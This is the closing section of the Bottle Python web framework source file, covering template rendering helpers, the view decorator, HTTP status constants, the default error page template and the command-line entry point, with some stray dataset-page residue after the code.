            prefix = text[pos:]
            lines = prefix.splitlines(True)
            # A trailing '\\' in the template suppresses the final newline.
            if lines[-1].endswith('\\\\\n'): lines[-1] = lines[-1][:-3]
            parts.append(nl.join(map(repr, lines)))
        code = '_printlist((%s,))' % ', '.join(parts)
        self.lineno += code.count('\n')+1
        self.write_code(code)
    def process_inline(self, chunk):
        ''' Wrap an inline expression: {{!x}} is raw, {{x}} is escaped. '''
        if chunk[0] == '!': return '_str(%s)' % chunk[1:]
        return '_escape(%s)' % chunk
    def write_code(self, line, comment=''):
        ''' Append one translated line at the current indentation level. '''
        code  = '  ' * (self.indent+self.indent_mod)
        code += line.lstrip() + comment + '\n'
        self.code_buffer.append(code)
def template(*args, **kwargs):
    '''
    Get a rendered template as a string iterator.
    You can use a name, a filename or a template string as first parameter.
    Template rendering arguments can be passed as dictionaries
    or directly (as keyword arguments).
    '''
    tpl = args[0] if args else None
    adapter = kwargs.pop('template_adapter', SimpleTemplate)
    lookup = kwargs.pop('template_lookup', TEMPLATE_PATH)
    cache_key = (id(lookup), tpl)
    # In debug mode templates are re-prepared on every call; otherwise a
    # prepared instance is cached per (lookup, tpl) pair.
    if DEBUG or cache_key not in TEMPLATES:
        settings = kwargs.pop('template_settings', {})
        if isinstance(tpl, adapter):
            # Caller handed us a pre-built template instance.
            TEMPLATES[cache_key] = tpl
            if settings:
                TEMPLATES[cache_key].prepare(**settings)
        elif "\n" in tpl or "{" in tpl or "%" in tpl or '$' in tpl:
            # Looks like an inline template string, not a file name.
            TEMPLATES[cache_key] = adapter(source=tpl, lookup=lookup,
                                           **settings)
        else:
            TEMPLATES[cache_key] = adapter(name=tpl, lookup=lookup, **settings)
    if not TEMPLATES[cache_key]:
        abort(500, 'Template (%s) not found' % tpl)
    for dictarg in args[1:]:
        kwargs.update(dictarg)
    return TEMPLATES[cache_key].render(kwargs)
# Convenience wrappers that pre-select a specific template adapter.
mako_template = functools.partial(template, template_adapter=MakoTemplate)
cheetah_template = functools.partial(template, template_adapter=CheetahTemplate)
jinja2_template = functools.partial(template, template_adapter=Jinja2Template)
def view(tpl_name, **defaults):
    ''' Decorator: renders a template for a handler.
        The handler can control its behavior like that:

          - return a dict of template vars to fill out the template
          - return something other than a dict and the view decorator will not
            process the template, but return the handler result as is.
            This includes returning a HTTPResponse(dict) to get,
            for instance, JSON with autojson or other castfilters.
    '''
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            outcome = func(*args, **kwargs)
            if isinstance(outcome, (dict, DictMixin)):
                # Handler-supplied variables win over decorator defaults.
                merged = defaults.copy()
                merged.update(outcome)
                return template(tpl_name, **merged)
            if outcome is None:
                # No return value at all: render with the defaults only.
                return template(tpl_name, defaults)
            # Anything else bypasses template processing entirely.
            return outcome
        return wrapper
    return decorator
# Adapter-specific variants of the view() decorator; the template_adapter
# keyword travels through view()'s defaults into template(), which pops it.
mako_view = functools.partial(view, template_adapter=MakoTemplate)
cheetah_view = functools.partial(view, template_adapter=CheetahTemplate)
jinja2_view = functools.partial(view, template_adapter=Jinja2Template)
###############################################################################
# Constants and Globals ########################################################
###############################################################################
TEMPLATE_PATH = ['./', './views/'] #: directories searched for template files
TEMPLATES = {} #: cache of prepared templates, keyed by (id(lookup), tpl)
DEBUG = False #: enables verbose errors and disables template caching
NORUN = False # If set, run() does nothing. Used by load_app()
#: A dict to map HTTP status codes (e.g. 404) to phrases (e.g. 'Not Found')
HTTP_CODES = httplib.responses
HTTP_CODES[418] = "I'm a teapot" # RFC 2324
HTTP_CODES[428] = "Precondition Required"
HTTP_CODES[429] = "Too Many Requests"
HTTP_CODES[431] = "Request Header Fields Too Large"
HTTP_CODES[511] = "Network Authentication Required"
# Pre-formatted status lines ("404 Not Found") for building response headers.
_HTTP_STATUS_LINES = dict((k, '%d %s'%(k,v)) for (k,v) in HTTP_CODES.items())
#: The default template used for error pages. Override with @error()
#: NOTE: the '%%' sequences become single '%' after the string is %-formatted
#: with __name__ below; the stpl engine then treats them as code-line markers.
ERROR_PAGE_TEMPLATE = """
%%try:
%%from %s import DEBUG, HTTP_CODES, request, touni
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: {{e.status}}</title>
<style type="text/css">
html {background-color: #eee; font-family: sans;}
body {background-color: #fff; border: 1px solid #ddd;
padding: 15px; margin: 15px;}
pre {background-color: #eee; border: 1px solid #ddd; padding: 5px;}
</style>
</head>
<body>
<h1>Error: {{e.status}}</h1>
<p>Sorry, the requested URL <tt>{{repr(request.url)}}</tt>
caused an error:</p>
<pre>{{e.body}}</pre>
%%if DEBUG and e.exception:
<h2>Exception:</h2>
<pre>{{repr(e.exception)}}</pre>
%%end
%%if DEBUG and e.traceback:
<h2>Traceback:</h2>
<pre>{{e.traceback}}</pre>
%%end
</body>
</html>
%%except ImportError:
<b>ImportError:</b> Could not generate the error page. Please add bottle to
the import path.
%%end
""" % __name__
#: A thread-safe instance of :class:`LocalRequest`. If accessed from within a
#: request callback, this instance always refers to the *current* request
#: (even on a multithreaded server).
request = LocalRequest()
#: A thread-safe instance of :class:`LocalResponse`. It is used to change the
#: HTTP response for the *current* request.
response = LocalResponse()
#: A thread-safe namespace. Not used by Bottle.
local = threading.local()
# Initialize app stack (create first empty Bottle app)
# BC: 0.6.4 and needed for run()
app = default_app = AppStack()
app.push()
#: A virtual package that redirects import statements.
#: Example: ``import bottle.ext.sqlite`` actually imports `bottle_sqlite`.
#: (The 'bottle.ext' name is only used when this module runs as a script.)
ext = _ImportRedirect('bottle.ext' if __name__ == '__main__' else __name__+".ext", 'bottle_%s').module
# Command-line interface: ``python bottle.py [options] package.module:app``
if __name__ == '__main__':
    opt, args, parser = _cmd_options, _cmd_args, _cmd_parser
    if opt.version:
        _stdout('Bottle %s\n'%__version__)
        sys.exit(0)
    if not args:
        parser.print_help()
        _stderr('\nError: No application specified.\n')
        sys.exit(1)
    # Make the target app importable relative to the CWD, and let
    # ``import bottle`` resolve to this very module when run as a script.
    sys.path.insert(0, '.')
    sys.modules.setdefault('bottle', sys.modules['__main__'])
    host, port = (opt.bind or 'localhost'), 8080
    # Split an optional ':port' suffix. The rfind comparison keeps a bare
    # bracketed IPv6 address like '[::1]' intact while '[::1]:80' is split.
    if ':' in host and host.rfind(']') < host.rfind(':'):
        host, port = host.rsplit(':', 1)
    host = host.strip('[]')
    run(args[0], host=host, port=int(port), server=opt.server,
        reloader=opt.reload, plugins=opt.plugin, debug=opt.debug)
# THE END
| 39.460022
| 103
| 0.592563
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.